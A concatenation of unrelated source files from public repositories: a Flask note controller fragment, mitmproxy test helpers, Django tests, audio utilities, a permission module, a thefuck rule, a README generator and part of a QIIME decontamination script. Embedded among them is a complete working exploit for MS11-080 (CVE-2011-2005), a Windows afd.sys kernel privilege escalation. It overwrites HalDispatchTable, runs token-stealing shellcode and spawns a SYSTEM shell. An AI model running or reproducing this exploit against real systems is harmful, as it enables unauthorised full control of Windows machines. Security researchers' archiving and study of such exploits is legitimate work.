emit('modify_note', Response.CommitteeNoteDoesntExist)
return
committee = Committees.query.filter_by(id= committee_note.committee).first()
if(user.id == committee_note.author):
if "description" in user_data:
committee_note.description = user_data['description']
if(user.id == committee.head or user.is_admin or user.id == committee_note.author):
if "hidden" in user_data:
committee_note.hidden = user_data['hidden']
db.session.add(committee_note)
try:
db.session.commit()
emit('modify_committee_note', Response.ModifySuccess)
#get_note(committee_note.id, broadcast = True)
except Exception as e:
db.session.rollback()
db.session.flush()
emit("modify_committee_note", Response.ModifyError)
else:
emit("modify_committee_note", Response.UsrNotAuth)
| ritstudentgovernment/chargeflask | app/committee_notes/controllers.py | Python | mit | 5,203 |
import uuid
from typing import Optional, Union
from mitmproxy import connection
from mitmproxy import flow
from mitmproxy import http
from mitmproxy import tcp
from mitmproxy import websocket
from mitmproxy.test.tutils import treq, tresp
from wsproto.frame_protocol import Opcode
def ttcpflow(client_conn=True, server_conn=True, messages=True, err=None) -> tcp.TCPFlow:
if client_conn is True:
client_conn = tclient_conn()
if server_conn is True:
server_conn = tserver_conn()
if messages is True:
messages = [
tcp.TCPMessage(True, b"hello", 946681204.2),
tcp.TCPMessage(False, b"it's me", 946681204.5),
]
if err is True:
err = terr()
f = tcp.TCPFlow(client_conn, server_conn)
f.messages = messages
f.error = err
f.live = True
return f
def twebsocketflow(messages=True, err=None, close_code=None, close_reason='') -> http.HTTPFlow:
flow = http.HTTPFlow(tclient_conn(), tserver_conn())
flow.request = http.Request(
"example.com",
80,
b"GET",
b"http",
b"example.com",
b"/ws",
b"HTTP/1.1",
headers=http.Headers(
connection="upgrade",
upgrade="websocket",
sec_websocket_version="13",
sec_websocket_key="1234",
),
content=b'',
trailers=None,
timestamp_start=946681200,
timestamp_end=946681201,
)
flow.response = http.Response(
b"HTTP/1.1",
101,
reason=b"Switching Protocols",
headers=http.Headers(
connection='upgrade',
upgrade='websocket',
sec_websocket_accept=b'',
),
content=b'',
trailers=None,
timestamp_start=946681202,
timestamp_end=946681203,
)
flow.websocket = twebsocket()
flow.websocket.close_reason = close_reason
if close_code is not None:
flow.websocket.close_code = close_code
else:
if err is True:
# ABNORMAL_CLOSURE
flow.websocket.close_code = 1006
else:
# NORMAL_CLOSURE
flow.websocket.close_code = 1000
flow.live = True
return flow
def tflow(
*,
client_conn: Optional[connection.Client] = None,
server_conn: Optional[connection.Server] = None,
req: Optional[http.Request] = None,
resp: Union[bool, http.Response] = False,
err: Union[bool, flow.Error] = False,
ws: Union[bool, websocket.WebSocketData] = False,
live: bool = True,
) -> http.HTTPFlow:
"""Create a flow for testing."""
if client_conn is None:
client_conn = tclient_conn()
if server_conn is None:
server_conn = tserver_conn()
if req is None:
req = treq()
if resp is True:
resp = tresp()
if err is True:
err = terr()
if ws is True:
ws = twebsocket()
assert resp is False or isinstance(resp, http.Response)
assert err is False or isinstance(err, flow.Error)
assert ws is False or isinstance(ws, websocket.WebSocketData)
f = http.HTTPFlow(client_conn, server_conn)
f.request = req
f.response = resp or None
f.error = err or None
f.websocket = ws or None
f.live = live
return f
class DummyFlow(flow.Flow):
"""A flow that is neither HTTP nor TCP."""
def __init__(self, client_conn, server_conn, live=None):
super().__init__("dummy", client_conn, server_conn, live)
def tdummyflow(client_conn=True, server_conn=True, err=None) -> DummyFlow:
if client_conn is True:
client_conn = tclient_conn()
if server_conn is True:
server_conn = tserver_conn()
if err is True:
err = terr()
f = DummyFlow(client_conn, server_conn)
f.error = err
f.live = True
return f
def tclient_conn() -> connection.Client:
c = connection.Client.from_state(dict(
id=str(uuid.uuid4()),
address=("127.0.0.1", 22),
mitmcert=None,
tls_established=True,
timestamp_start=946681200,
timestamp_tls_setup=946681201,
timestamp_end=946681206,
sni="address",
cipher_name="cipher",
alpn=b"http/1.1",
tls_version="TLSv1.2",
tls_extensions=[(0x00, bytes.fromhex("000e00000b6578616d"))],
state=0,
sockname=("", 0),
error=None,
tls=False,
certificate_list=[],
alpn_offers=[],
cipher_list=[],
))
return c
def tserver_conn() -> connection.Server:
c = connection.Server.from_state(dict(
id=str(uuid.uuid4()),
address=("address", 22),
source_address=("address", 22),
ip_address=("192.168.0.1", 22),
timestamp_start=946681202,
timestamp_tcp_setup=946681203,
timestamp_tls_setup=946681204,
timestamp_end=946681205,
tls_established=True,
sni="address",
alpn=None,
tls_version="TLSv1.2",
via=None,
state=0,
error=None,
tls=False,
certificate_list=[],
alpn_offers=[],
cipher_name=None,
cipher_list=[],
via2=None,
))
return c
def terr(content: str = "error") -> flow.Error:
err = flow.Error(content, 946681207)
return err
def twebsocket(messages: bool = True) -> websocket.WebSocketData:
ws = websocket.WebSocketData()
if messages:
ws.messages = [
websocket.WebSocketMessage(Opcode.BINARY, True, b"hello binary", 946681203),
websocket.WebSocketMessage(Opcode.TEXT, True, b"hello text", 946681204),
websocket.WebSocketMessage(Opcode.TEXT, False, b"it's me", 946681205),
]
ws.close_reason = "Close Reason"
ws.close_code = 1000
ws.closed_by_client = False
ws.timestamp_end = 946681205
return ws
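# Usage sketch (illustrative): building flows for a unit test.
#
#   f = tflow(resp=True)          # HTTP flow with both request and response
#   assert f.response is not None and f.websocket is None
#
#   wf = tflow(ws=True)           # flow carrying websocket data
#   assert wf.websocket is not None and len(wf.websocket.messages) == 3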
| mitmproxy/mitmproxy | mitmproxy/test/tflow.py | Python | mit | 5,859 |
from django.test import Client
import mock as mock
from image_converter.tests.base import ImageConversionBaseTestCase
from image_converter.utils.convert_image import convert_image_to_jpeg
__author__ = 'Dominic Dumrauf'
class ViewsTestCase(ImageConversionBaseTestCase):
"""
Tests the 'views'.
"""
def test_upload_get(self):
"""
Tests GETting the form initially.
"""
# Given
c = Client()
# When
response = c.get('/')
# Then
self.assertTemplateUsed(response, template_name='upload.html')
self.assertEqual(response.status_code, 200)
self.assertIn('form', response.context)
def test_upload_post_without_file(self):
"""
Tests POSTing a form which *lacks* a file.
"""
# Given
c = Client()
# When
response = c.post('/')
# Then
self.assertTemplateUsed(response, template_name='upload.html')
self.assertFormError(response, 'form', 'file', 'This field is required.')
self.assertEqual(response.status_code, 200)
self.assertIn('form', response.context)
def test_upload_post_with_non_image_file(self):
"""
Tests POSTing a form which contains a file but the file is not an image.
"""
# Given
c = Client()
# When
with open(self.non_image_file_path) as fp:
response = c.post('/', {'file': fp})
# Then
self.assertTemplateUsed(response, template_name='unsupported_image_file_error.html')
self.assertEqual(response.status_code, 200)
self.assertIn('file', response.context)
self.assertIn(self.non_image_file_name, response.content)
def test_upload_post_with_image_file(self):
"""
Tests POSTing a form which contains a file where the file is an image.
"""
# Given
c = Client()
# When
with open(self.image_file_path) as fp:
response = c.post('/', {'file': fp})
converted_image = convert_image_to_jpeg(fp)
# Then
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Disposition'], 'attachment; filename={0}.jpg'.format(self.image_file_name))
self.assertEqual(response.content, converted_image.getvalue())
@mock.patch('image_converter.views.convert_image_to_jpeg')
def test_unexpected_error_in_image_conversion_handling(self, convert_image_to_jpeg):
"""
Tests POSTing a form where converting the image raises an unexpected exception.
"""
# Given
convert_image_to_jpeg.side_effect = Exception()
c = Client()
# When
with open(self.non_image_file_path) as fp:
response = c.post('/', {'file': fp})
# Then
self.assertTemplateUsed(response, template_name='generic_error.html')
self.assertEqual(response.status_code, 200)
self.assertIn('file', response.context)
self.assertIn(self.non_image_file_name, response.content)
| dumrauf/web_tools | image_converter/tests/test_views.py | Python | mit | 3,078 |
#!/usr/bin/python3
#
# Copyright © 2017 jared <jared@jared-devstation>
#
from pydub import AudioSegment, scipy_effects, effects
import os
import settings, util
# combine two audio samples with a crossfade
def combine_samples(acc, file2, CROSSFADE_DUR=100):
util.debug_print('combining ' + file2)
sample2 = AudioSegment.from_wav(file2)
output = acc.append(sample2, crossfade=CROSSFADE_DUR)
output = effects.normalize(output)
return output
# combine audio samples with crossfade, from within program
def combine_prog_samples(acc, nsamp, CROSSFADE_DUR=100):
output = acc.append(nsamp, crossfade=CROSSFADE_DUR)
return output
# split an audio file into low, mid, high bands
def split_file(fname):
curr_file = AudioSegment.from_file(fname)
low_seg = scipy_effects.low_pass_filter(curr_file, settings.LOW_FREQUENCY_LIM).export(fname + '_low.wav', 'wav')
mid_seg = scipy_effects.band_pass_filter(curr_file, settings.LOW_FREQUENCY_LIM, settings.HIGH_FREQUENCY_LIM).export(fname + '_mid.wav', 'wav')
high_seg = scipy_effects.high_pass_filter(curr_file, settings.HIGH_FREQUENCY_LIM).export(fname + '_high.wav', 'wav')
## add a sample to an existing wav
#def add_sample(fname, samplefile, CROSSFADE_DUR=100):
# new_file = combine_samples(fname, samplefile, CROSSFADE_DUR)[0]
# os.rename(fname, 'old_' + fname)
# os.rename(new_file, fname)
# return new_file[1]
| techlover10/StochasticSoundscape | src/audio.py | Python | mit | 1,411 |
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: [email protected] - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ########
################################################################################
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser
usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
action="store", dest="target_os",
help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
parser.print_help()
sys.exit()
OS = OS.upper()
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
def findSysBase(drvname=None):
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drvname:
if drivername.value.lower() == drvname:
print "[+] Retrieving %s info..." % drvname
print "[+] %s base address: %s" % (drvname, hex(baseaddy))
return baseaddy
else:
if drivername.value.lower().find("krnl") !=-1:
print "[+] Retrieving Kernel info..."
print "[+] Kernel version:", drivername.value
print "[+] Kernel base address: %s" % hex(baseaddy)
return (baseaddy, drivername.value)
return None
print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - [email protected]"
print "[>] Release Date 28/11/2011"
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
None, 0, 0)
if client == ~0:
raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(4455)
addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
## We need to connect to a closed port, socket state must be CONNECTING
connect(client, byref(addr), sizeof(addr))
except:
closesocket(client)
raise
baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zerobits = c_int(0)
RegionSize = c_int(0x1000)
written = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
"\x00\x00\x00\x00\x44\x44\x44\x44"
"\x01\x00\x00\x00"
"\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver = c_char_p()
lpPath = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
################################# EXPLOITATION #################################
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
if OS == "XP":
_KPROCESS = "\x44"
_TOKEN = "\xc8"
_UPID = "\x84"
_APLINKS = "\x88"
else:
_KPROCESS = "\x38"
_TOKEN = "\xd8"
_UPID = "\x94"
_APLINKS = "\x98"
restore_ptrs = "\x31\xc0" + \
"\xb8" + struct.pack("L", HalpSetSystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x8) + \
"\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x10"
restore_token = "\x52" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\x15\x00\x09\x02\x00" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5a" +\
"\xc2\x10"
shellcode = padding + restore_ptrs + tokenstealing
shellcode_size = len(shellcode)
orig_size = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL = 0x000120bb # AFDJoinLeaf
inputbuffer = 0x1004
inputbuffer_size = 0x108
outputbuffer_size = 0x0 # Bypass Probe for Write
outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger shellcode
inp = c_ulong()
out = c_ulong()
inp = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")
############################## POST EXPLOITATION ###############################
print "[*] Restoring token..."
## Restore the thingie
shellcode = padding + restore_ptrs + restore_token
shellcode_size = len(shellcode)
trail_padding = (orig_size - shellcode_size) * "\x00"
shellcode += trail_padding
shellcode_size += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"
| SecWiki/windows-kernel-exploits | MS11-080/CVE-2011-2005.py | Python | mit | 12,217 |
from pathlib import Path
class MarkdownParser():
def __init__(self, text):
self.text = text
self.lines = text.split('\n')
def title(self):
return self.lines[0].split(' ')[1]
def header(self, name, level, include_header=False):
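        # Scan line by line: `start` flips on when the '{mark} {name}' heading
        # is seen and off again (`end`) at the next same-level heading with a
        # different title, so `content` collects the body of the requested
        # section (plus the heading itself when include_header is True).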
start = False
end = False
content = []
mark = '#' * level
for line in self.lines:
if start and not end:
end |= (f'{mark} ' in line[:(level + 1)]) and (not f'{mark} {name}' in line)
if end:
start = False
else:
content.append(line)
else:
start = (f'{mark} {name}' in line)
if start:
end = False
if include_header:
content.append(line)
content = '\n'.join(content)
return content
def overview(self):
overview = self.header('Overview', 2)
overview = overview.split('\n')
overview = '\n'.join(overview[1:]) # remove the first line
return overview
def features(self):
return self.header('C++', 2, True)
def combine(text, parsers):
overview = ''
features = ''
title = ''
for p in parsers:
title += p.title().replace('C++', '') + '/'
overview += p.overview() + '\n'
features += p.features() + '\n'
title = title[:-1]
overview = overview.replace('README.md#', '#')
features = features.replace('README.md#', '#')
text = text.replace('# C++\n', f'# C++{title}\n')
    text = text.replace('<!-- overview -->', overview)
    text = text.replace('<!-- features -->', features)
return text
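# Note: `combine` assumes readme-template.md contains a literal '# C++' heading
# plus '<!-- overview -->' and '<!-- features -->' placeholder comments; those
# placeholders are replaced with the concatenated per-version sections.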
def main():
src_dir = Path(__file__).parent
parsers = []
srcs = list(src_dir.glob('CPP*.md'))
srcs.sort(reverse=True)
for file in srcs:
with open(file, 'r') as fp:
text = fp.read()
p = MarkdownParser(text)
parsers.append(p)
template_file = src_dir / 'readme-template.md'
with open(template_file, 'r') as fp:
text = fp.read()
text = combine(text, parsers)
readme_file = src_dir / 'README.md'
with open(readme_file, 'w') as fp:
fp.write(text)
if __name__ == '__main__':
main()
| AnthonyCalandra/modern-cpp-features | auto-generate-readme.py | Python | mit | 2,305 |
import functools
from common.tornado_cookies import get_secure_cookie, generate_secure_cookie
from core import cookies
class Perms(object):
NONE = None
READ = 'r'
WRITE = 'w'
def _permission_level(user, room):
"""
`user`'s permission level on `room`, ignoring cookies
"""
if not user.is_authenticated():
return Perms.READ
else:
return Perms.WRITE
def _get_cached_perm_level(request, cookie_name):
perm = get_secure_cookie(request, cookie_name)
if not perm:
return
assert perm in ('r', 'w')
return perm
def _set_cached_perm_level(response, cookie_name, perm_level):
assert perm_level in ('r', 'w')
cookie_val = generate_secure_cookie(cookie_name, perm_level)
response.set_cookie(cookie_name, cookie_val)
def _perm_level_satisfies(perm_val, perm_req):
"""
    Whether a user holding permission level `perm_val`
    satisfies a request for access level `perm_req`.
"""
if perm_req == perm_val:
return True
if (perm_val == Perms.WRITE) and (perm_req == Perms.READ):
return True
return False
def get_permission(request, response, room, perm_req):
"""
Returns True or False.
Sets a cookie on the response object to cache
the result, if necessary.
"""
assert perm_req in (Perms.READ, Perms.WRITE)
if cookies.has_cached_room_permission(
room.shortname,
perm_req,
functools.partial(get_secure_cookie, request),
session_key=request.session.session_key,
uid=getattr(request.user, 'id', None)):
return True
# Cached permission does not satisfy requirement.
perm_actual = _permission_level(request.user, room)
if perm_actual == Perms.NONE:
return False
assert perm_actual in (Perms.READ, Perms.WRITE)
result = _perm_level_satisfies(perm_actual, perm_req)
cookie_name = cookies.room_cookie_name(room.shortname, session_key=request.session.session_key, uid=getattr(request.user, 'id', None))
if result:
_set_cached_perm_level(response, cookie_name, perm_actual)
return result
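# Hypothetical usage from a Django-style view (the names below are
# illustrative and not part of this module):
#
#   response = render(request, 'room.html', {'room': room})
#   if not get_permission(request, response, room, Perms.READ):
#       return HttpResponseForbidden()
#   return response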
| reverie/seddit.com | redditchat/core/permissions.py | Python | mit | 2,122 |
from difflib import get_close_matches
from thefuck.utils import sudo_support, get_all_executables, get_closest
@sudo_support
def match(command, settings):
return 'not found' in command.stderr and \
bool(get_close_matches(command.script.split(' ')[0],
get_all_executables()))
@sudo_support
def get_new_command(command, settings):
old_command = command.script.split(' ')[0]
new_command = get_closest(old_command, get_all_executables())
return ' '.join([new_command] + command.script.split(' ')[1:])
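# Illustrative example (assuming `python` is among the executables returned by
# get_all_executables()): a mistyped `pyton manage.py` whose output contains
# 'not found' would be corrected to `python manage.py`.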
priority = 3000
| mbbill/thefuck | thefuck/rules/no_command.py | Python | mit | 580 |
#!/usr/bin/env python
# File created on 09 Aug 2012
from __future__ import division
__author__ = "Jon Sanders"
__copyright__ = "Copyright 2014, Jon Sanders"
__credits__ = ["Jon Sanders"]
__license__ = "GPL"
__version__ = "1.9.1"
__maintainer__ = "Jon Sanders"
__email__ = "[email protected]"
__status__ = "Development"
from qiime.util import load_qiime_config, parse_command_line_parameters,\
get_options_lookup, make_option
from qiime.parse import parse_qiime_parameters, parse_taxonomy, parse_mapping_file_to_dict
from qiime.filter import sample_ids_from_metadata_description
from bfillings.uclust import get_clusters_from_fasta_filepath
from bfillings.usearch import usearch_qf
from scipy.stats import spearmanr
import os.path
from biom import load_table
import numpy as np
options_lookup = get_options_lookup()
script_info = {}
script_info['brief_description'] = """
A script to filter sequences by potential contaminants"""
script_info['script_description'] = """
This script performs a series of filtering steps on a sequence file with the
intent of removing contaminant sequences. It requires input of an OTU table, a
sample map, an OTU map, a sequence FASTA file, and an output directory.
There are two primary approaches the script can take: (1) comparing sequence
abundances in blank control sequence libraries to those in sample libraries,
where sequences present in blanks are presumed to be contaminants, and (2)
comparing sequences in sample libraries to a database of known contaminants.
In approach (1), OTUs (or unique sequences, if OTU table and map are defined at
100% identity) are tested for their maximum and mean presence in blank and
sample libraries, and excluded if they satisfy the given criteria. For example,
if you want to exclude any sequences whose maximum abundance in a blank sample
is more than 10% the maximum abundance in a sample (maxB > 0.1 * maxS), you
would choose '--removal_stat_blank maxB --removal_stat_sample maxS
--removal_differential 0.1'. For this approach, you must also provide a column
in your mapping file that indicates which samples to use as blanks, and pass
this information to the script with the 'valid states' option (e.g.
'Blank:True')
In approach (2), you must provide a fasta library of putative contaminants.
These may be previously clustered OTUs from the blank samples, commonly
sequenced contaminants (if known), or another fasta file. Sequences will be
clustered against this fasta file using Uclust-Ref, and any that match within
a given percent similarity (using the '-c' or '--contaminant_similarity' option)
will be marked as putative contaminants.
When using approach (2), it is possible to remove 'real' sequences from samples
that just happen to be similar to contaminants. This may be detectable when
using unique sequence OTU tables/maps as input, if the 'real' sequences are
nonetheless slightly different from contaminants. In this case, it may be
desirable to reinstate those unique sequences that are present in samples but
not in blanks. You may do this using criteria of relative abundance (similar to
approach [1], where a sequence is reinstated if its max presence in a sample is
greater than its max presence in a blank, i.e. maxS > X * maxB) or of incidence
in non-blank samples (i.e. reinstated if present in two or more samples). If
both criteria are provided, you must choose to reinstate either the intersection
of the criteria (i.e. BOTH more abundant in samples AND present in 2 or more)
or the union (i.e. EITHER more abundant in samples OR present in 2 or more).
"""
script_info['script_usage'] = []
script_info['script_usage'].append(("""Example:""", """
The following steps are performed by the command below:
1. Calculate max relative abundance of each sequence in samples and blanks
2. Identify sequences whose maximum abundance in blanks is more than 10% their
maximum abundance in samples.
3. Output OTU maps of sequences for which above is true, and for which above is
false.
""", """
decontaminate.py -i unique_seqs_otu_table.biom -o filter_out_dir
-m metadata_mapping_file.txt -f unique_seqs_rep_set.fna
-M unique_seqs_otus.txt -s 'Blank:True' --removal_stat_blank maxB
--removal_stat_sample maxS --removal_differential 0.1
"""))
script_info['output_description'] = """
This script will output a tab-delimited summary table, indicating the relative
abundance stats for each sequence considered, along with its fate at each step
of the process.
It will also output an OTU map for each category of sequences identified (e.g.
those never identified as contaminants, those identified as reference-based
contaminants, those identified as abundance-based contaminants, and those
reinstated). These OTU maps can then be used to filter in the input FASTA file.
Output file naming:
contamination_summary.txt -- tab-delimited per-sequence summary file
passed_otu_map.txt -- OTU map of non-contaminant sequences
ref_contaminants_otu_map.txt -- OTU map of reference contaminant sequences
abund_contaminants_otu_map.txt -- OTU map of abundance contaminant sequences
reinstated_contaminants_otu_map.txt -- OTU map of reinstated sequences
"""
script_info['required_options'] = [
options_lookup["output_dir"]
]
script_info['optional_options'] = [
options_lookup["otu_table_as_primary_input"],
make_option('--mothur_counts_fp',
type='existing_filepath',
help='path to mothur counts table as input'),
options_lookup["mapping_fp"],
make_option('-M', '--otu_map_fp', type="existing_filepath",
help='the input OTU map file'),
make_option('-s',
'--valid_states', type='string',
help="Column header:value pair in mapping file identifying blank samples"),
make_option('--blank_id_fp',
type='existing_filepath',
help='path to file listing blank sample ids'),
options_lookup["input_fasta"],
make_option('--contaminant_db_fp', type="existing_filepath",
help='A FASTA file of potential contaminant sequences'),
make_option('-c', '--contaminant_similarity', type='float', default=0.97,
help=('Sequence similarity threshold for contaminant matches')),
make_option('-r', '--max_correlation', type='float',
help=('Maximum Spearman correlation for contaminant identification')),
make_option('--correlate_header', type='string',
help=('Column header in mapping file with correlation data')),
make_option('--min_relabund_threshold', type="float",
help='discard sequences below this relative abundance threshold'),
make_option('--prescreen_threshold', type="float",
help='prescreen libraries that lose more than this proportion of sequences'),
make_option('--removal_stat_blank', type="choice", choices=["maxB", "avgB"],
help='blank statistic to be used for removal (maxB, avgB)'),
make_option('--removal_stat_sample', type="choice", choices=["maxS", "avgS"],
help='sample statistic to be used for removal (maxS, avgS)'),
make_option('--removal_differential', type="float",
help='differential proportion for removal (maxB > X * maxS)'),
make_option('--reinstatement_stat_blank', type="choice", choices=["maxB", "avgB"],
help='blank statistic to be used for reinstatement (maxB, avgB)'),
make_option('--reinstatement_stat_sample', type="choice", choices=["maxS", "avgS"],
help='sample statistic to be used for reinstatement (maxS, avgS)'),
make_option('--reinstatement_differential', type="float",
help='differential proportion for reinstatement (maxS > X * maxB)'),
make_option('--reinstatement_sample_number', type="int",
help='minimum number of samples necessary for reinstatement'),
make_option('--reinstatement_method', type="choice", choices=["union", "intersection"],
help='method to rectify reinstatement criteria'),
make_option('--drop_lib_threshold', type="float",
help='read loss threshold to drop libraries from output table'),
make_option('--write_filtered_output', action="store_true",
help='write an output table filtered of contaminants'),
make_option('--write_per_library_stats', action="store_true",
help='write a per-library decontamination summary'),
make_option('--write_per_seq_stats', action="store_true",
help='write a per-sequence decontamination summary'),
make_option('--write_per_seq_disposition', action="store_true",
help='write a per-sequence disposition file'),
make_option('--write_output_seq_lists', action="store_true",
help='write separate sequence name lists for each contaminant category')
]
script_info['version'] = __version__
def pick_ref_contaminants(queries, ref_db_fp, input_fasta_fp, contaminant_similarity, output_dir):
# Blast against contaminant DB
clusters, failures, seeds = get_clusters_from_fasta_filepath(
input_fasta_fp,
input_fasta_fp,
percent_ID=contaminant_similarity,
max_accepts=1,
max_rejects=8,
stepwords=8,
word_length=8,
optimal=False,
exact=False,
suppress_sort=False,
output_dir=output_dir,
enable_rev_strand_matching=False,
subject_fasta_filepath=ref_db_fp,
suppress_new_clusters=True,
return_cluster_maps=True,
stable_sort=False,
save_uc_files=True,
HALT_EXEC=False)
# Pick seqs that fail the similarity to contaminants rule
ref_contaminants = set(queries) - set(failures)
return(ref_contaminants)
def pick_corr_contaminants(sample_biom,
corr_data_dict,
max_r):
# Filter biom to only samples for which correlate data available
sample_biom_filt = sample_biom.filter(
lambda val, id_, metadata: id_ in corr_data_dict,
invert=False,
inplace=False)
otus = sample_biom_filt.ids(axis='observation')
samples = sample_biom_filt.ids(axis='sample')
# Make array of correlate data in same order as biom file
correlate = [corr_data_dict[x] for x in samples]
obs_corr_dict = {}
# Make a 2D array of normalized biom table values
norm_array = sample_biom_filt.norm(inplace=False).matrix_data.toarray()
t = 0
for otu in otus:
obs_corr_dict[otu] = spearmanr(norm_array[t], correlate)
t += 1
# get keys (otu names) for OTUs with less than minimum correlation
obs_corr_contaminants = [x for x in obs_corr_dict if obs_corr_dict[x][0] < max_r]
return(set(obs_corr_contaminants), obs_corr_dict)
def reinstate_abund_seqs(putative_contaminants,
contamination_stats_dict,
contamination_stats_header,
reinstatement_stat_sample,
reinstatement_stat_blank,
reinstatement_differential):
